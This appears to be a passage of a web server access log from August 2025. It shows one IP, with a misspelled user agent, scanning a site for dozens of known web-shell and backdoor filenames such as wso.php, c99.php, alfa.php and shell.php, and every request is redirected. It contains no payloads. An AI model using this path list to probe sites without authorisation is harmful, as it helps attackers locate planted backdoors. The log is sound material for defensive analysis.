Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:47:50 -0400] "GET /cong.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:47:53 -0400] "GET /options.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:47:56 -0400] "GET /wp-content/index.php?x=ooo HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:48:02 -0400] "GET /wp-admin/options.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:48:10 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:48:16 -0400] "GET /sts.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:48:18 -0400] "GET /wp-hoard.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:48:20 -0400] "GET /1index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:48:23 -0400] "GET /11index.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:48:30 -0400] "GET /2index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:48:37 -0400] "GET /3index.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:48:44 -0400] "GET /wp_wrong_datlib.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:48:47 -0400] "GET /wp-adminincludesclass-wp-media-list-data.php HTTP/1.1" 301 279 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:48:50 -0400] "GET /autoload_classmap.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:48:54 -0400] "GET /wso.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:48:57 -0400] "GET /doc.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:49:03 -0400] "GET /stindex.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:49:05 -0400] "GET /alwso.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:49:09 -0400] "GET /ups.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:49:11 -0400] "GET /media-admin.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:49:17 -0400] "GET /sym.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:49:21 -0400] "GET /sym403.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:49:25 -0400] "GET /fw.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:49:29 -0400] "GET /symlink.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:49:30 -0400] "GET /shell.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:49:38 -0400] "GET /1.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:49:45 -0400] "GET /data.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:49:51 -0400] "GET /wp-blog.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:49:54 -0400] "GET /b.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:49:58 -0400] "GET /c.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:50:00 -0400] "GET /shx.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:50:03 -0400] "GET /alfa.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:50:08 -0400] "GET /a.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:50:18 -0400] "GET /old-index.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:50:20 -0400] "GET /FoxWSO.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:50:24 -0400] "GET /x.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 149.50.215.205 - - [13/Aug/2025:03:50:26 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [13/Aug/2025:03:50:26 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [13/Aug/2025:03:50:26 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [13/Aug/2025:03:50:26 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [13/Aug/2025:03:50:28 -0400] "GET /403.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:50:31 -0400] "GET /mini.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:50:35 -0400] "GET /imagesvuln.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:50:37 -0400] "GET /edit-form.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:50:40 -0400] "GET /wikindex.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:50:42 -0400] "GET /m.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:50:44 -0400] "GET /0byte.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:50:49 -0400] "GET /xx.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:50:53 -0400] "GET /new-index.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:50:56 -0400] "GET /wp.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:50:59 -0400] "GET /wp-wso.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:51:04 -0400] "GET /qindex.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:51:06 -0400] "GET /priv8.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:51:08 -0400] "GET /minimo.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:51:09 -0400] "GET /xleet.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:51:14 -0400] "GET /V3.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:51:22 -0400] "GET /V5.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:51:24 -0400] "GET /404.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:51:28 -0400] "GET /up.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:51:31 -0400] "GET /www.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:51:33 -0400] "GET /100.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:51:38 -0400] "GET /777.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:51:40 -0400] "GET /defau1t.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:51:45 -0400] "GET /f.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:51:48 -0400] "GET /xox.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:51:52 -0400] "GET /o.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:51:58 -0400] "GET /new.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:52:01 -0400] "GET /sindex.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:52:04 -0400] "GET /baindex.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:52:06 -0400] "GET /wi.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:52:11 -0400] "GET /mar.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:52:13 -0400] "GET /root.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:52:15 -0400] "GET /nee.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:52:18 -0400] "GET /v.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:52:21 -0400] "GET /z.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:52:24 -0400] "GET /g.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:52:29 -0400] "GET /c99.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:52:32 -0400] "GET /w.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:52:39 -0400] "GET /ws.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:52:42 -0400] "GET /2.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:52:47 -0400] "GET /lol.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 122.154.30.136 - - [13/Aug/2025:03:52:50 -0400] "GET //admin_panel/lala.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:52:51 -0400] "GET /87.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:52:55 -0400] "GET /7yn.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:52:58 -0400] "GET /haxor.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:01 -0400] "GET /13.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:07 -0400] "GET /e.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:09 -0400] "GET /r.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:11 -0400] "GET /t.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:13 -0400] "GET /y.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:15 -0400] "GET /u.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:17 -0400] "GET /i.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:21 -0400] "GET /p.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:23 -0400] "GET /q.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:25 -0400] "GET /s.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:53:27 -0400] "GET /d.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 